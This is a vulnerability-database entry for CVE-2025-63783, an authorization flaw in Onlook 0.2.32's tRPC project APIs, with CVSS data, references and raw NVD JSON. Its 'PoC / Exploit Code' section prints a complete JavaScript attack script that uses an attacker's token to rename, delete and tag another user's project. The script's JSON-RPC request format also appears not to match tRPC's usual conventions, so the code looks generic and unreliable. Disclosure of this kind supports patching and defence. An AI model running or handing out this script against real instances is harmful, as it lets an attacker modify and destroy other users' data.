Security Vulnerability Report
CVE-2025-63783 CVSS 7.6 HIGH

CVE-2025-63783

Published: 2025-11-07 16:15:43
Last Modified: 2026-02-05 16:25:17

Description

A Broken Object Level Authorization (BOLA) vulnerability was discovered in the tRPC project mutation APIs (update, delete, add/remove tag) of the Onlook web application 0.2.32. The vulnerability exists because the API fails to verify the ownership or membership of the currently authenticated user for the requested project ID. An authenticated attacker can send a malicious request containing another user's project ID to unlawfully modify, delete, or manipulate tags on that project, which can severely compromise data integrity and availability.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:onlook:onlook:0.2.32:*:*:*:*:*:*:* - VULNERABLE
Onlook web application 0.2.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
import fetch from 'node-fetch';

// CVE-2025-63783 PoC - BOLA vulnerability in Onlook tRPC API
// Target: Onlook web application 0.2.32
const TARGET_URL = 'http://target-onlook-instance.com';
const ATTACKER_TOKEN = 'attacker-auth-token-here';

async function exploitBola() {
  const victimProjectId = 'victim-project-uuid-here';

  // PoC 1: Unauthorized Project Update
  const updatePayload = {
    jsonrpc: '2.0',
    id: 1,
    method: 'project.update',
    params: {
      projectId: victimProjectId,
      data: {
        name: 'Hacked by Attacker',
        description: 'This project was modified via BOLA vulnerability'
      }
    }
  };
  const updateResponse = await fetch(`${TARGET_URL}/trpc`, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Authorization': `Bearer ${ATTACKER_TOKEN}`
    },
    body: JSON.stringify(updatePayload)
  });
  console.log('Update Response:', await updateResponse.json());

  // PoC 2: Unauthorized Project Delete
  const deletePayload = {
    jsonrpc: '2.0',
    id: 2,
    method: 'project.delete',
    params: { projectId: victimProjectId }
  };
  const deleteResponse = await fetch(`${TARGET_URL}/trpc`, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Authorization': `Bearer ${ATTACKER_TOKEN}`
    },
    body: JSON.stringify(deletePayload)
  });
  console.log('Delete Response:', await deleteResponse.json());

  // PoC 3: Unauthorized Tag Manipulation
  const tagPayload = {
    jsonrpc: '2.0',
    id: 3,
    method: 'project.addTag',
    params: { projectId: victimProjectId, tag: 'malicious-tag' }
  };
  const tagResponse = await fetch(`${TARGET_URL}/trpc`, {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Authorization': `Bearer ${ATTACKER_TOKEN}`
    },
    body: JSON.stringify(tagPayload)
  });
  console.log('Tag Response:', await tagResponse.json());
}

exploitBola().catch(console.error);

References

https://blog.soohyun.tech/CVE-2025-63783-IDOR-in-Onlook-27a557175d2e8061a3dbc931da53f095 (Exploit, Third Party Advisory)
https://tossbank.notion.site/IDOR-in-onlook-27a557175d2e8061a3dbc931da53f095 (Broken Link)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63783",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-07T16:15:42.943",
    "lastModified": "2026-02-05T16:25:17.197",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Broken Object Level Authorization (BOLA) vulnerability was discovered in the tRPC project mutation APIs (update, delete, add/remove tag) of the Onlook web application 0.2.32. The vulnerability exists because the API fails to verify the ownership or membership of the currently authenticated user for the requested project ID. An authenticated attacker can send a malicious request containing another user's project ID to unlawfully modify, delete, or manipulate tags on that project, which can severely compromise data integrity and availability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-20" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:onlook:onlook:0.2.32:*:*:*:*:*:*:*",
                "matchCriteriaId": "6A720EDB-10C0-47F4-BCF5-138FB5124DFA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://blog.soohyun.tech/CVE-2025-63783-IDOR-in-Onlook-27a557175d2e8061a3dbc931da53f095",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://tossbank.notion.site/IDOR-in-onlook-27a557175d2e8061a3dbc931da53f095",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      }
    ]
  }
}